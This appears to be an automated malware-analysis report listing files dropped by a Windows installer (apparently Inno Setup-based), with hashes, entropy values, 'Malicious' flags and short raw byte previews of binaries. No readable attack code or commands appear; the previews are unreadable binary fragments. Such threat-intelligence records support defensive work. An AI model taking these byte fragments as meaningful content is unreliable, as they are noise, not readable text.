                        Preview:....813.....]C*.:.i./.h.O+++...{.0==-..k../..%/...2 B0..`..L&..~......NNN....]........B.....YvL..SR|...TnZ.$J..7vlAR....IDAT..vl.QS...Z>......&z..<.G.....m..i<~...........X.....H$.o..ZYY.JL~.!..^........AEk ..X...?....d2..N..D"1....d0==...Q.\..+...l..N.2...,.)h...H......}%...L.....F...0.%..,.........8.sss...?l...........~.....).Z..+..+.K...@rP.AH2.c......>.&...|>....\........A...{.-6.Md...D......0n... ..G.U.af\.D....A.........@+4.y......q..U....s.\..v.4==......7oV#.....|....P~....@./...<.2.[.....L....7...FGGgI.....cdd..x\.?(..z..?......u..N....~.e}z- Ss..... .c...|Fz.pO..*R.....1==.h4....=..?.D"........./W.W...+..."..[.K ..R.5. i.6nmm9>..H2.Ld2.[f......D........ ..I.Ty.2....:..u../.~..u.?...&..^....H&...............Z ..lff&y......r]..............%P.../...=z.Y]]....Z*.V,..D"1!Tw..B.,.....>5.@k..LHN.h..%.H...=_>...H...d....t......b......~.V.mz<.....n......W..b4.%.H.^.d.+g.....`(.` ....X...?.lllL....J.r.b.,.....E$.I1.0..\...m.^Ky......k(.0.."-..
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):78
                        Entropy (8bit):2.448303597829603
                        Encrypted:false
                        SSDEEP:3:CkLOvNUqt/vll:CGq
                        MD5:37D8A9DB0253FB2410345A012DEB0C12
                        SHA1:964314E1D6B3632CD22AE95D3731139D5136443A
                        SHA-256:B34BE6A42ADE40EB84BEDF48A2651E1389EA6A32EB9FAB652E10AF253ADE437F
                        SHA-512:D8564667106D712381EFD04F811FDCC9BEDE88ECBCAE1FF48D24E56CCCD02689A780CFC3AC3226C3FC19EC4BB844BD67E12F3C361D7586508293CB924F54205F
                        Malicious:false
                        Preview:TRUEANALOGMINDOC..MZ......................@...................................
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):45056
                        Entropy (8bit):5.030971375798974
                        Encrypted:false
                        SSDEEP:768:osWjcdeDvFQC7VkrHpluuxdCvEHKKgItUHk:osWjcdmQuklluhvEHKxk
                        MD5:57F6091B9D7F02A70F51BABB2E8E33A2
                        SHA1:1EC92FF6C37AE1B66A956AB521B561376C2CAB1A
                        SHA-256:E5F17527B397125F260651BCD5FFA2DF07B50C1A2C983073C10589EF38BF18A1
                        SHA-512:451833C1807B66DFBC90FE48E95B4F05D77AC49220CC20E6574028DC119A6FCA93C9D49C42102619E6D0DAF4281C21355BED0E2581C97EDEB0130DB0AB491622
                        Malicious:false
                        Preview:-.S.E...t.h.-.T.H...t.r.-.T.R...u.r.-.P.K...i.d.-.I.D...u.k.-.U.A...b.e.-.B.Y...s.l.-.S.I...e.t.-.E.E...l.v.-.L.V...l.t.-.L.T...f.a.-.I.R...v.i.-.V.N...h.y.-.A.M...a.z.-.A.Z.-.L.a.t.n.....e.u.-.E.S...m.k.-.M.K...t.n.-.Z.A...x.h.-.Z.A...z.u.-.Z.A...a.f.-.Z.A...k.a.-.G.E...f.o.-.F.O...h.i.-.I.N...m.t.-.M.T...s.e.-.N.O...m.s.-.M.Y...k.k.-.K.Z...k.y.-.K.G...s.w.-.K.E...u.z.-.U.Z.-.L.a.t.n.....t.t.-.R.U...b.n.-.I.N...p.a.-.I.N...g.u.-.I.N...t.a.-.I.N...t.e.-.I.N...k.n.-.I.N...m.l.-.I.N...m.r.-.I.N...s.a.-.I.N...m.n.-.M.N...c.y.-.G.B...g.l.-.E.S...k.o.k.-.I.N.....s.y.r.-.S.Y.....d.i.v.-.M.V.....q.u.z.-.B.O.....n.s.-.Z.A...m.i.-.N.Z...a.r.-.I.Q...d.e.-.C.H...e.n.-.G.B...e.s.-.M.X...f.r.-.B.E...i.t.-.C.H...n.l.-.B.E...n.n.-.N.O...p.t.-.P.T...s.r.-.S.P.-.L.a.t.n.....s.v.-.F.I...a.z.-.A.Z.-.C.y.r.l.....s.e.-.S.E...m.s.-.B.N...u.z.-.U.Z.-.C.y.r.l.....q.u.z.-.E.C.....a.r.-.E.G...z.h.-.H.K...d.e.-.A.T...e.n.-.A.U...e.s.-.E.S...f.r.-.C.A...s.r.-.S.P.-.C.y.r.l.....s.e.-.F.I...q.u.z.-.P.E.....a.r.-.L.
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):25600
                        Entropy (8bit):6.507217585416609
                        Encrypted:false
                        SSDEEP:768:O+jBAfe6TtgguvkFec+jJ5PZvimdFiFGbC:ZfUCJ5h3Fw
                        MD5:F751364CFA63775137CB5146FE58A499
                        SHA1:2B74004F95CEDF6EEEAA413ADF3572962C8F5754
                        SHA-256:24144F909C12F3BB5D11ED1FA3052D22079198E6E5CB0748EC740E8075925A0D
                        SHA-512:62116162EDA5AC185EB9BBE5165390487EE0C05DDF328B513944ECFBCD0D5E0D7CC2A19F23A07A78BF61B559CCDEE34728E7FD957301D5C66F00DEEF4EBF93D5
                        Malicious:false
                        Preview:..X..0.D$..G..p.........F.....DX.P.\...Y..t#.G.C.p.........F......XkD$........D$..\$..\$..D$4.D$..?...j.j....H....d"...M.h..I..............j....v..L$X......G.j).p....f.....t..L$d..........9....v..L$h.....G.j).0...6.....t.......P..........v..L$H.d....|$..w..L$0.....T$,Q.t$(.L$0.t$(..........u.Pj..<....t$.Q.L$(.{.....u..M..D$TP.....Jj....u.j............H.u.j......j.......u.........&..F.......j.j..H....@!...L$ .r..._^3.[..]......LG..KG.xKG.DKG..KG..JG..JG..JG.{JG.U...o.....u.V.u........&..F.....^3.]...U..E..@....x..u....x..t.V.u....b....&..F.....^3.]...U.....E.VW.@..0.......N....E..A..E.A..E..A..M..E.........u..u...|.I..E.P......u...........M..F......>....._3.^..]...U..E..@....x..u....@.V.u.....u................u.....3.@.F..........&..F.....3.^]...U..E.V.@..0.~..u..6j).........t..u....W...3.@.F.....j*........u....t..6............)....&..F.....3.^]...U..QQ.E.VW...@....y..u....@..x..u....y..u....U.RP.C.....t..u.........E....E..F......F..".u........&.3.@j..F.P...H........_3
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23552
                        Entropy (8bit):6.5589376742169385
                        Encrypted:false
                        SSDEEP:384:dQRiUYoelmXaQtviQM5uOcylkpDNQeScHgkYSO+qlf2eE4TJH05eZ3ChIYXBdSsu:dZoeqaQ1/uu1ylkp5VAkGh2RDuaIYXBg
                        MD5:C289C1EF7516A3290E029D6A7E5135FE
                        SHA1:78CBEB2FFA4339E531DB791A1E9F2E745B917519
                        SHA-256:EDCC787AF1FA464F28F3D01A414FA94509512A79E988C9A6E6DCBB25AB4A25F8
                        SHA-512:C85C7F16182BD65D0805FB77856506DC49C16BADB62F497F043AB8601E1C26D9C8DD44E85A76BCFCF5F107001E3FC21AF4FFFA0462F1B862784324D679A5966B
                        Malicious:false
                        Preview:.M..\......K......@.f;E.t0f..@uIBj3.....Yf9H........C......@.Ph.......t....M..2....M..*..._^[..]...j.jn..C.......@.Pj.XP....C..D....@.Ph.....U....SV.u.W..3.j..F.A[.M..@.f9X.u..M.3..j.e...E.e..j.P.E..M.PV.......x..N..E....f9X.t...@...Pjr......M...._^[..]....M........M.u..e...3..~..\....>.tC........8.t.........8.t.........8.u...C.....M..@.@.......;].|..j.h.......=....{...U...LSV3.3.W...].@.]..M..]..]..E..oM...u..E.......H.E.E..E..E..P.H....}....U.........}........I3........J...f9p..u.u...........Ht#Ht.H......Hu.K..u...I.E...M.M...u.8].u..A.3..E...E.....f9H.u..8.u...j..U.Y...E...P.E.PR..............U..M..E.@....f.x..u.....0......E...E.."...C......E.@......@.Pjr.<.}..t&.E...t..E.P..\....|....}...E.u..E.....E.j.......h...........M..}....M..u..._^[..]...U.......S3.VW...E.3.E.A.E.E...L..}.M..u!....tL.h..I....L......h$.C...z..Y.u..]....C.A.....3.f9B.u7.....t"HHt.Ht...B.Pj......j.Z.A.....3.B....B...Pjn......U..=.rL...U.u.j.Z....u.B.U..K...j3_.E........f9x
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):63488
                        Entropy (8bit):6.700214587939564
                        Encrypted:false
                        SSDEEP:1536:ADzMdMhrNCsGJh5yA05E22VelTXzSj9xb7XDh1RlyxcZqvi1:0M0lAYrlTGj91DhrlyQ
                        MD5:1FBEEEB8A198656EFBF434AF4366A042
                        SHA1:35A2A4CA3BB39B79E79EB16EACA4D76B0D4A85E0
                        SHA-256:5A2EEA9C51D2C4449DC72A543E782E687B12AC0845D2A2C9706DA0365FDB87A0
                        SHA-512:9C9E1745F2397CD13B26B58609600EA79F165760BBDB20420CBB15E698B20520FB7C1782B73F2ECEB8A236BD1CA7A71DE442AB73F1A29FE4AE8201FC6B8341ED
                        Malicious:false
                        Preview:..P....U..}.;...n9...E...M.@P.u.V.u..u..2.........'4...E.U....B.U.;.s.3...4.....u..F|...E...........9..;F|...9...........;E....8..f.......f#......f;.u.....E...@..P.u.V.u..u..-2.......t..3...E...M.@P.u.V.u..u...2......}............n3...E.9E....8...M.;N|..............M.%....=....u.............%...............M.......v...n..28...................M......8...M..E....E.@P.u.V.u..u..[1.........].....2............7..;..............2...E.9E....7...E.;F|..a..........E.......v...n...7...................M.....z7...E...M.@.E.P.u.V.u..u...0.......t../2...E...}.@P.u...V.u..u..0..........2...E.9E... 7..;~|sr.......U..t*..%....=....u.............%..............R.U..)!..........6...E....E.@P.u...V.u..u...0.......t..1............6..;......\.............6..;V|..{6..;......;....M..........`6..;N|..W6........E...}.@P.u...V.u..u../..........1...U....M.E.;E....6...F|+.;.w....P.u.W.'F.......u..}..:.U.........F|...+.;..........P.E.PW..E..............M.<O.E....E.@P.u...V.u..u.../...M...
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):6.466205625101586
                        Encrypted:false
                        SSDEEP:768:F79sAOOWNMZmwfHh17McqQHEdQ7iwDIUKh:F9sAO+kdIlDbKh
                        MD5:345A00A391EF07A9A2EBC03D00C87457
                        SHA1:F86D44EF822ADE1207F99597723C60CE51EDD7A1
                        SHA-256:95562ACA3CB3D37E726B77DAAB78F0BAF4866465B93E42A4DEA2F969989C35EB
                        SHA-512:0BA81C9DE1EE2E4F0D8727E2630A59ED842BC101BC6C408ED0C6F5F9A77988943160FBDF03499671EF74391EB5CE5C48B0CDAB740A6DEDA05BEA57152DB5839D
                        Malicious:false
                        Preview:P...R...x..u..M..Gs...u....WW.H.......E.P...Q..E.P...Q.....3.h....Pf............P.R...E.....U.E........E..E.E.3..E.E..U..U.P.U..E.x.F..}.....I.....t;.M.......P.r........PW....I.W..f.......t".M.......P.r....3.P..j..H........}..t..u.....`.I..M..x?.._^3.[..]...U.....$....G=..S.].3.VW...D$..C..L$,.|$..p....o...F.3.B.{...T$(.0r..C..H..r..3.B;.u...3...3...\$.f9........L$(.....+u..........-u....3........Rtg..rtb..AtY..atT..StK..stF..Ht<..ht7..Nt+..nt&..Ot...ot...Tt...t..M........................j.X..j...j ....;.u....|$....D$....3.f9...V....E..@..0....n...N..T$....D$..A..D$..A..D$ .A...D$$....#....$0...P.D$4P..$8...P..$<...P.t$(.c.......$0...P..$4...P..P....$8...P.D$<P..O.......$0...Ph......0.I..=..I...$0...P...t@.L$0.7o....t..D$0P....I..L$..t$.....#.P.D$4P....I...u8..$0...P..u....]n..3..F........s.u....Fn..3..F........e..tN.D$0P..D$0h.K.P.{O..YY...t$..t$..L$0.D$4.t$.VP......u..u.....m..3..F.........$0...P..L$...<.._^3.[..]...U..E.Vj...@..0.E.P.......t).......E.......p
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):26624
                        Entropy (8bit):6.279320534560886
                        Encrypted:false
                        SSDEEP:768:/PDqdU7SIc/jnsRf4rJsb25v0hL4G+CAiwo8Z8T5RZWfeTcmr5DhaED:/2dU7SP/jnsF4rJsx9RZqegm5kED
                        MD5:0CBB04B1F3A1713685E51D611C9958C5
                        SHA1:907E4DE587C4C2FC12418F36158428B7252D083D
                        SHA-256:D5BD599E463E0087634C0A3BE19C15839832D61BA48488DDEFF5D83E4013A0F8
                        SHA-512:25F7E9AD1B4A361C18597646FF470E2B15993242C49F8EA0F40A1691855584DD3E861385D33E11D5EA3176764521A39291AB32369AA024B42E25EB74C037BA30
                        Malicious:false
                        Preview:.9E.r<.M.+.f..f;.4...u%.............f.A.......f;.6...u.............E...........E.;E.......f...E.....f#E..E.....f;E.E.u.....E.......;E...:.......9E.........x.....t(9E.v_j.......R..M.P.Y..............t8.V....9E.r-.M.+.f..f;.4...u........t-f.A.f;.6...t ........x....E...U.9U.......r..........E..U.f.z...........t.........;......f.:..........U.....;...1............;.t....;.t.;........E...U..F....}....'....E..E...........t0................$.4hD...(......,....<.U..U.;.w5.}...Q..,........U.t.;.s.f.......f#......f;.u.....U.....3...|...9u.tu..t*9E.sl.u.......R..M.P...........L....U..;........+..M.;.w*f..f;.4...u..............f.A.f;.6.................|....U.9u.......;......;.....v5f.z..u.;.s*f.:.u$.G.....u....t....t........u.....U....U..u.....................M....~".U.+.}.E.+......8.X....~.+....p..........Q..M...........|!.......P.........P.E....P........9].~..M.............8dJ.....Q...;...Y...3..[.......i....E..<}....;.~......3...4.+......;.....#...9...G.......v.;.r..&...
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):5.915263981899243
                        Encrypted:false
                        SSDEEP:384:nBjwTZwNKm7AI4xhLk5QdSJBkHn7DPhJhFTqUF2zCTWy1x1ab5lbTHVi5GwUvc7z:B+I0IKQ8SbkXhdqgWWwr2G+jvEHHU
                        MD5:7B8A3A110041FF45398E6B411E012938
                        SHA1:C007FA1E32340D06C6FF94E566E6E54ADE8455C7
                        SHA-256:AEF4DD356C6667D6D58A158B3CEB7ABEF485669651679E4F800A5F5CA5FA6668
                        SHA-512:7E364645072F287B49B319444C1EBF7418CB5570F9F986D5598FB2B32C3DA58899D39571236783062CE726E7BD2398504C0FCC4E13D00E20445EF97331C076F8
                        Malicious:false
                        Preview:......j.....I...._^[..]...U..S.].W.u..3......E.YY..t...+;.....3..|..Y........~.2..'V.u.W.3V.r......3.f..~^9E.t.G..?......._[]...VW..4.I.....h.I.....tmS..gL.V....y.....tY...hL...W....0.x......t?..$hL.....9.t1.V..$hL.............u.......P......Ph.....1....I.[_^.U..}..t..u...gL..x......hL......hL....u.3.....hL.......0..<.I.3.@]...U....hL.W.}...t.W..gL..<x......u.2.......hL.V....0..u...\.I.9.t.2.....j.V..gL..3u....t....E.j.h..H.....x....E.....|....E..........E..%LhL....PhL.........l....ThL...p....XhL..6..x.I..}..LhL......t.;.t.P..gL..Jw.......u..'...^_]...U..}..t..u...gL..Yw......hL......hL....u.3..-..hL.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U.....|hL.VW.}..E...t=..99t..E.P.M..y....E...M..y..u..E..|hL.P.(....DQ......wi...7.u..~..u.3..-.M...^..V.M.}..Ti...E.|hL.P.R....M..Xi..3.@_^..]...U..}..t..u...gL..cv......hL......hL....tW..hL.V....0.~..t.9..gL.u....gL...v...H.I..f...}..t#.u..u...L.I..F...4.I.9.u...hL...gL.^]...U..}..t..u...gL...u......hL......hL....u.3..-..hL..
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):5.797845051243723
                        Encrypted:false
                        SSDEEP:768:EoLVNIo8DJWxWWbP75qcaTlKWzhQVNsbSSkLQ7PqYIueIVvaOsibz1:PL/4aj5Vf7gqYrui31
                        MD5:9C4A2E0B1A7548FA2A3EADF25A82673C
                        SHA1:90F49BA8DEDB9074726DCD3C01D9814C1482945E
                        SHA-256:7046618D867C1B0E66FEFFC8986B45D66A989D3F60731C932331A817391A9B4B
                        SHA-512:9937B5BAA87D3F8C14D393B9E73EC7BBD5E7AFAB868DA1521874E613278A5020FF1B932E96F59EA007C0494E6FA2A28E2387F6B506ADACD87C07ACD0E1CCECB9
                        Malicious:false
                        Preview:v..6..|.I..f$..G...t..p$.G..w.^_]....7..3...W......u#.?..u._.V.w$...2...W.......Y..u.^_..w......Y...A(....t..A0j..RP.U..............U....S.].VW.....K...2..E.................3..d$..G.;G........O..G.....D5.F.A..G....r..w..W...........E..E..<.t9<.tP.K.............C....9C.rB.S....E.....C..K........x...j..E...P......t..}....2..._^..[..]...=.A....Z......C...ty......P.C..e............t..K.AQPV......3........3.s...j..E.Ph.....w..7....I..........E..............E.....q..._^[..].........U....SV..M......E..P......t .u..E.P.......M..]...^..[..]...2...U....SV..F,...us.e..j.XP.E.....Yj..E.........3.CY..tt...E..E..P.......u#.u...u..u......YV.....Y2..^[..]....u..E.P.k....M...........t(...t#...t....t......p....u.......e....u.......U..QSVW...M.......u.3.].9.v%j..E...P.......t!.u..M..E.../...C;.r...._^[..]....E...u...U....SV..M..@....u..E...P......t .u..E.P.......M......^..[..]...2...U..A,...t%...t ...t....t....t....u.]....].....].....A,...w3.$.=<A.......j ..........j@......
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):66560
                        Entropy (8bit):6.766766918528127
                        Encrypted:false
                        SSDEEP:1536:Vxj/JiB27MlRHq6EQU7uLQT6unj5ctpYuYtWGJG2kQyyv:VqM7MlRKecTF5c2p02kQ/
                        MD5:CEE4EA617F6D78EDC814E113DEB23AF6
                        SHA1:4653F7BBE7C1857B1175DF5826EDDF5F21AABF37
                        SHA-256:CDE6901A10D8DFE4C6DEAE40BA432A0817623B0C3C59F98A3E98F5029648CC64
                        SHA-512:092F290D43B9B69609F09648C135545C352BCEE8BF53AC6681452E6ADC55730DD6082A708B448D3EF2D732A4BF8FB5FD777C12C337784DF07AE2AEC3CF94C8A8
                        Malicious:false
                        Preview:....M...O.E..t.f.u..U......f#.f.u...t......f..f.u..E.j.QQ..$.1.......#j.Q..Q..$..........................^.E..8_].U..QQ.M..E..E..........%........]...f.M..E...].U..}......E.u...u.@].}.....u...u.j.X].M......f#.f;.u.j.......f;.u..E.....u...t.j...3.].U..E.. t.j.....t.3.@]..t.j.....t.j.X].........].S..QQ......U.k..l$........P.K.3.E.V.s .C.VP.s..........u&.e..P.C.P.C.P.s..C .s.P.E.P.....s ....s..c....=..L..Yu)..t%.C.V....\$....\$..C...$.s.P......$..P.X.....$....V.....C.YY.M.3.^.+.....]..[.U....S.].V.......t..E..t.j.....Y..........t..E..t.j..v...Y....u.............E........j..S....E.Y.....#.tT=....t7=....t.;.ub.M.........p.K....{L.H.M..........{,..p.K..2.M..........z...p.K....M..........z...`.K.....`.K.......................E........W3....t.G.M...........D.........E.PQQ..$.....E..........E..U...=....}.3...G.W..3.....Au.B.E............f.E..E.;.})+.E..E..t...u.G...E...E.t.......E..m.Iu..E..t....E.....3.G.._t.j......Y......t..E. t.j .....Y...3...^...[..].U..=..L..u%.u..E...
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):6.399121727243068
                        Encrypted:false
                        SSDEEP:192:8zk9hQpFL2OGmLmXQWbAq98Hg7wjhjt1XDcegBMtWS+XQVlfu6NW1/:CvgmLmXQWbAqTwj1XIegjSbZm
                        MD5:6152E5059BDF115EF3C7B8562E3D2DAA
                        SHA1:FC3537BD2C572F1E5F44C62FFDC341725EFC5122
                        SHA-256:4EEC518BB557354048323338141015C3FD5633C81B0ADEBC4554DF823F8C3B17
                        SHA-512:DA1DD8832112B2F91FD5FB258BE7E6E6ED6C75735690277F3D419F8536B1BF06D4E0AB4053A51D5FAA43EB1E7847FCCC827E0721FBB2B076D5704B176033B9F5
                        Malicious:false
                        Preview:.G......G..%.}....n....T$.3....@S.G.P...H.......V....I..L$H.9p.._^..[..]...U..QS.].VW.E...{..r..C..H......t..E...C..p....{....F..8.C..0...j....F....u........Y..u..u........&..F....._^3.[..]...U..SV.u.2.~..r..F..H........t...F..0........N..........u..u....{....&..F.....^3.[]...U..........SVW..3..M.h..I..\$8......E..@..0......N....D$..A..D$..A..D$..A..L$..D$.....l...t$..t$.....I....K..L$..s^....t.jc.l...K..L$..]^....t.j..V. .K..L$..G^....t.j..@.4.K..L$..1^....t.j..*.@.K..L$...^....t.j....P.K..L$...^....t.j.^...`.K..L$...]..........3.ja.D$L[.D$.S.L$....hp.K..L$...j...t$.....I.;.t...cu(...t#hL,I..L$..d...t$..t$..h...YG.D$..YC..z~..........M......O.3.Q..FVS.\$..Z....d$4..D$,j.VPS.|$<.t$H........L$ ...;.|e.\$HS.L$<..k..P.L$$.Q...Vj..D$(P.t$........L$ .z....L$8.gm..F...;.~....T$4...H........H...j.j.....L$..7m.._^3.[..]...U........k..SVWj.......I....E..@..8......O....E..A..E.A..E..A..M..E......h....3.......PWWWWW.u.....I..M...t.......P.....h..I......Wj..H.........
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):35840
                        Entropy (8bit):7.994801100442519
                        Encrypted:true
                        SSDEEP:768:HfvkzWD0cilJR7czChAME9572gQMCHsa0tOgh5P:/vL3i97FdE3qgQMCz0tOgnP
                        MD5:66D04BBFA2B3B805940FF6D39004F6FD
                        SHA1:7CFD832694CBA11437A2BBA62A8C809B133BA0E3
                        SHA-256:4FE85AD2A1CA692AC79BE4BBB8E67D0C745B40D57A4B5358E3BA3E5A9DF0B842
                        SHA-512:F68D52EB55FE879806AA6899E0C2263C400628E3076F2173A2D6D00E62BDF4E6EC7A7E5BE0E60D1E5E0007DBB8A6A679CC18110AE1AD0DE2F93EE32B897E362A
                        Malicious:false
                        Preview:...l..1..W..Z....f#n....Y^.Fut...r..N.x.AX.......H.7=.Z............Q.:.TUGh......<...g4.....6m...*.r.Et...j.q).^.....F...N\_.r....5g..C...a."..|FmW8....:x.C}.gw..^Vc...GjSZ9....l.!..fYW"...<./.....}g...I....W......o...;8jX..l*{+h....$.f.j..k....l...}....<..G.t)7J.......#c.....(6.W/..<.}..i......N_.Z.rC.a.wM........Z.d......?...X....$........NW...=..N.>.....@:.].P"..m.VJn...3h.0..#.rn..rVV...c@.F.......`..m..FQ:D...p..W7.k..#C[0(...Ce....U.....,..te....1..3.-....!......,;...V.#..._..5z.H.....S..>.........B....u.ICWkq....L...i..Y..6.Z....o.:bX..4; .$.8.\.<;..%K.(^..?...0.;N.KWL7..:2.j..K.NQ<A9.^.=.G.Z3..M.., .X.u.,...XVVeK<C6.G.....lsL.e..6..V..,....k.u.o..Zr....D)^...w.......p......aFB./..K....c....N..W=4.5...9.....L...{...[.w!.W8.E....7G.*...P....m.<7.Xf..BP.D.\...]{.d....2..v.I.oH..'...t.P..#9..S..!.;]..f>.su.8.<...[....T..h......J6...l...zS...,....\........5..21..4Y..]....w......tz.y..e.X/.... ..JVRt......l.%..P....'..v|..#.
                        Process:C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3117568
                        Entropy (8bit):6.370208522022616
                        Encrypted:false
                        SSDEEP:49152:VWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbE3336B:PtLutqgwh4NYxtJpkxhGP3338
                        MD5:6CE04FD06C6A2CADE4A53F1521743144
                        SHA1:E3060C2A0980017FDA65C799647AB52E154CD35A
                        SHA-256:953E01C7C8E8FF0C26AE66898442B5001E759928C9C7FA60C17B84EF5469227F
                        SHA-512:FC1544E6404107D5423F0642ED6C5720BE2F686B223478299A7A521978CC13BA64041D75175E4C03B0B0D180D456C1F98BD8654CC81828FDF353DC29523F7839
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,..B......hf,......p,...@...........................0...........@......@....................-.......-..9.......b...........................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc....b.......d....-.............@..@..............1.......0.............@..@........................................................
                        Process:C:\Program Files (x86)\StrLocalGate\Setup.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3251712
                        Entropy (8bit):6.216482143463603
                        Encrypted:false
                        SSDEEP:49152:PEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVZ3338b:T92bz2Eb6pd7B6bAGx7D333M
                        MD5:85FE6257CAB9D61BA8C481C64D0026BD
                        SHA1:63B8BE81F4D48501948EC8D9289FA1EC26AC301D
                        SHA-256:FB8559BBA5EB4AC4AAC8208CC2B9C7AE3AE185B7D4A26F9024E1DE286595BA94
                        SHA-512:998F323022BB9D76036A52B10BCDB1ACB5173EFD1338304DB985E478A3E81F86A33B10256E11B040436BE546DADFB6A7955C12B706B5B98A55EF0C03CCFC716C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,..`......`F,......P,...@...........................2...........@......@....................-......p-.29....-.......................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@..............1.......0.............@..@........................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.5309574705616855
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 98.04%
                        • Inno Setup installer (109748/4) 1.08%
                        • InstallShield setup (43055/19) 0.42%
                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                        File name:be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                        File size:4'303'615 bytes
                        MD5:37bdc150af529c0f560f1269dee8fa17
                        SHA1:d5c9e4dd36a99407c0824478c00d0f97fb26ab2f
                        SHA256:be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb31c0e34c7835baa828af
                        SHA512:4ca293ca03072b503da6268849dfd982b86088595e8000d0c9a7efc7d10e6fa62eee62f8352ef0c439e503ff9bb51f2255b439afaef0056d88aca89c6227dd5f
                        SSDEEP:98304:FkLtSi+abHRQGUKn8sYUo315hKLeOKIan:G/1LDpzK3KM
                        TLSH:9516CF3BB268653EC5AA0B314573D270997BBE61A81A8C1E17F00D0FFF764601E3B656
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                        Icon Hash:2d2e3797b32b2b99
                        Entrypoint:0x4b5eec
                        Entrypoint Section:.itext
                        Digitally signed:false
                        Imagebase:0x400000
